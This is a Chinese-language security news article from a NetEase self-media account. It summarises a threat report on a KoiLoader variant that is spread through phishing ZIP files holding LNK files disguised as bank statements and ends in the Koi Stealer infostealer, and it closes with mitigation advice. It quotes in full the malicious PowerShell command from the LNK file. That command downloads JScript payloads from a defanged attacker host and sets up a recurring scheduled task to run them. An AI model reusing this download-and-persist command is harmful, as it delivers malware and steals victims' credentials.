网易首页 > 网易号 > 正文 申请入驻

【安全圈】网络威胁升级:新型 KoiLoader 利用 Powershell 脚本规避检测实现恶意软件投放

0
分享至

关键词

网络安全

网络安全研究人员发现了一场复杂的恶意软件攻击活动,其利用了 KoiLoader 的一个新变种,KoiLoader 是一种模块化的有效载荷交付系统,因分发像 Koi Stealer 这样的信息窃取软件而臭名昭著。

这个更新的变种使用嵌入在 Windows 快捷方式(LNK)文件中的 PowerShell 脚本,以绕过传统的检测机制,这显示出攻击方法的一种令人担忧的演变。

这场攻击活动的初始攻击入口涉及模仿金融机构的网络钓鱼电子邮件,用包含恶意 LNK 文件的 ZIP 压缩文件引诱受害者,这些恶意 LNK 文件被标记为银行对账单。

这些文件利用了一个已知的 Windows 漏洞(ZDI-CAN-25373)来隐藏命令行参数,在表面检查时掩盖其恶意意图。

eSentire 的威胁响应部门(TRU)在例行的威胁搜寻行动中首次检测到了这次入侵,观察到了该恶意软件旨在逃避端点检测与响应(EDR)工具的多阶段部署链条。

攻击始于嵌入在 LNK 文件中的一个 PowerShell 命令,该命令会下载两个 JScript 有效载荷(g1siy9wuiiyxnk.js 和 i7z1x5npc.js),以实现持久化并执行进一步的恶意活动。

值得注意的是,威胁行为者使用计划任务来保持执行的连续性,同时改变进程的父进程关系,以模仿合法的系统活动。

该恶意软件的影响不仅限于最初的被攻陷情况,因为 KoiLoader 便于交付 Koi Stealer,Koi Stealer 是一种基于 C# 的信息窃取软件,能够获取凭据、加密货币钱包和敏感文件。

随后的命令与控制(C2)通信使用加密的 HTTP POST 请求来窃取受害者的数据,包括操作系统详细信息、用户名和域名信息。

这场攻击活动表明,攻击者越来越依赖于利用合法二进制文件(LOLBins)和基于脚本的攻击来规避安全控制。

感染机制:PowerShell 和混淆脚本链式攻击

当受害者与 LNK 文件 chase_statement_march.lnk 进行交互时,感染链条就开始了,这会触发一个截断的 PowerShell 命令。

全面分析显示,该命令会将两个 JScript 文件下载到 % ProgramData% 目录,如下所示:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + ‘\’ + (‘g1siy9wuiiyxnk.js i7z1x5npc’); $getf=’Dow’+’nl’+’oadF’+’ile’; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = ‘wscript ‘; $w2al9zb7lb86ccs0.$getf(‘https://casettalecese[.]it/…/hemigastrectomySDur.php’, ‘g1siy9wuiiyxnk.js’);. (‘curl.exe’) -s -o 76mk0ik748fo ‘https://casettalecese[.]it/…/bivalviaGrr.php’; mv 76mk0ik748fo ‘i7z1x5npc.js’;. (‘sc’+’hta’+’s’+’ks’) /create /sc minute /mo 1 /f /tr (“wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc”) /tn i7z1x5npc;

第一个 JScript(g1siy9wuiiyxnk.js)会删除初始的计划任务,并通过 svchost.exe 下的 wscript.exe 重新启动有效载荷,以模拟良性活动。

eSentire 的分析师指出,这种技术会干扰基于进程谱系的检测,因为安全工具通常会将 wscript.exe 与用户发起的操作相关联,而不是与系统服务相关联。

辅助脚本(i7z1x5npc.js)会从注册表

(HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid)中检索受害者机器的全局唯一标识符(GUID),生成一个唯一的文件名,并获取两个 PowerShell 脚本:一个用于禁用反恶意软件扫描接口(AMSI)(boomier10qD0.php),另一个(nephralgiaMsy.ps1)用于将 KoiLoader 加载到内存中。

绕过 AMSI 使用了反射代码注入,然后,KoiLoader 的 shellcode 会使用从嵌入资源中获取的异或(XOR)密钥来解密并执行最终的有效载荷。

研究人员强调了它对 API 哈希的使用 —— 这是一种自定义算法,用于解析诸如 FindResourceW 和 LoadResource 等关键函数 —— 以阻碍静态分析。

这种多阶段的攻击方法凸显了对手在滥用合法二进制文件、混淆脚本和使用加密技术以逃避检测方面的手段日益复杂。

建议各组织通过应用程序控制策略(AppLocker)禁用 wscript.exe,监控 PowerShell 的执行日志,并部署基于行为的端点检测与响应(EDR)解决方案来缓解此类威胁。

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
中国农业银行河北省分行原党委委员、副行长许树宝被查

中国农业银行河北省分行原党委委员、副行长许树宝被查

大风新闻
2026-06-29 17:58:02
爆冷,混双8强出7!莎头下轮对手敲定 3号种子出局 张本美和遇国

爆冷,混双8强出7!莎头下轮对手敲定 3号种子出局 张本美和遇国

郝小小看体育
2026-06-30 07:00:05
气候大局已定?不出意外,7月份的中国天气或迎来3个变化

气候大局已定?不出意外,7月份的中国天气或迎来3个变化

混沌录
2026-06-30 15:14:18
梅西&姆巴佩之后,加克波成为近两届世界杯都进3+球的第三人

梅西&姆巴佩之后,加克波成为近两届世界杯都进3+球的第三人

懂球帝
2026-06-30 11:00:09
伊朗副外长:本周在多哈进行伊美技术性谈判不属实

伊朗副外长:本周在多哈进行伊美技术性谈判不属实

新京报
2026-06-29 18:21:29
巴西队2比1战胜日本队并晋级世界杯16强,巴西总统卢拉发声

巴西队2比1战胜日本队并晋级世界杯16强,巴西总统卢拉发声

环球网资讯
2026-06-30 16:24:05
停更5年,西祠胡同宣布回归!网友沸腾:一代人的青春要回来了

停更5年,西祠胡同宣布回归!网友沸腾:一代人的青春要回来了

鲁中晨报
2026-06-30 13:18:07
曼联球星重伤,世界杯变世界“悲”!5000万转会费打水漂

曼联球星重伤,世界杯变世界“悲”!5000万转会费打水漂

卡灵顿分析师
2026-06-30 19:24:45
痛心!华南理工大学教授汪益敏去世,60岁上月刚退休,死因成谜

痛心!华南理工大学教授汪益敏去世,60岁上月刚退休,死因成谜

北纬的咖啡豆
2026-06-29 19:46:48
刚提15天的蔚来ES9被高压水枪洗破车漆?蔚来官方回应:已与车主进行充分沟通,非质量缺陷

刚提15天的蔚来ES9被高压水枪洗破车漆?蔚来官方回应:已与车主进行充分沟通,非质量缺陷

每日经济新闻
2026-06-29 16:50:07
男性“最耗阳”行为,不是喝酒而是这些,排第一的,看看你在做吗

男性“最耗阳”行为,不是喝酒而是这些,排第一的,看看你在做吗

熊猫医学社
2026-06-30 11:30:03
世界杯头号水货!德国 1 亿巨星彻底翻车,离谱失误葬送全队

世界杯头号水货!德国 1 亿巨星彻底翻车,离谱失误葬送全队

澜归序
2026-06-30 08:55:27
比高血压还危险,这个指标一旦超标,脑梗随时可能发生!

比高血压还危险,这个指标一旦超标,脑梗随时可能发生!

芹姐说生活
2026-06-30 19:06:19
张智霖19岁儿子回香港形象大变,剃寸头清爽成熟,1.8米身高瞩目

张智霖19岁儿子回香港形象大变,剃寸头清爽成熟,1.8米身高瞩目

白面书誏
2026-06-29 23:25:05
A股:今天上午震荡拉升到4082,种种迹象表明,A股牛市已再次激活?

A股:今天上午震荡拉升到4082,种种迹象表明,A股牛市已再次激活?

趋势清风侠
2026-06-30 11:49:06
4年2400万美金!尼克斯第2笔签约达成!冠军中锋成抢手货

4年2400万美金!尼克斯第2笔签约达成!冠军中锋成抢手货

世界体育圈
2026-06-30 16:51:23
她是著名歌唱家,与著名大导演离婚,带儿子嫁高官,如今定居北京

她是著名歌唱家,与著名大导演离婚,带儿子嫁高官,如今定居北京

嘴角上翘的弧度
2026-06-29 20:36:25
1988年师长李德金开会路上被当场控制,全方位搜身后找到一串钥匙

1988年师长李德金开会路上被当场控制,全方位搜身后找到一串钥匙

磊子讲史
2026-06-23 14:10:47
日本内阁:日本就日本20家公司被列入出口管制名单向中国提出抗议

日本内阁:日本就日本20家公司被列入出口管制名单向中国提出抗议

俄罗斯卫星通讯社
2026-06-30 15:59:03
海尔、美的、格力回应欧洲空调需求激增

海尔、美的、格力回应欧洲空调需求激增

中国能源网
2026-06-30 09:44:04
2026-06-30 19:43:00
安全圈
安全圈
国内首家大安全概念新媒体
6696文章数 4688关注度
往期回顾 全部

科技要闻

iPhone18 Pro遭泄密!印度代工商惹祸

头条要闻

日本队世界杯出局后 韩媒来劲了

头条要闻

日本队世界杯出局后 韩媒来劲了

体育要闻

大热倒灶压力给到法国 王楚揭法国队隐患

娱乐要闻

韩红称要退出公益,多位名人挽留

财经要闻

韩国万亿"芯"基建:存储能否成AI时代油田

汽车要闻

奇瑞风云A9探店 五个理由一定来看看

态度原创

艺术
亲子
本地
游戏
公开课

艺术要闻

明代书坛的超级天才,仅用数年超越文徵明,随便一字被文人雅士视为至宝!

亲子要闻

✨闪闪小葵花 成长正当时✨ 「寻找闪亮小主角」才艺展示活动 沉浸式趣味闯关打卡,定格萌娃灵动鲜活的高光成长瞬间~

本地新闻

贵州小城的新目标:举办“村超”世界杯!

游戏还没发售就有“攻略书”了?AI瞎编20欧元一本

公开课

李玫瑾:为什么性格比能力更重要?

无障碍浏览 进入关怀版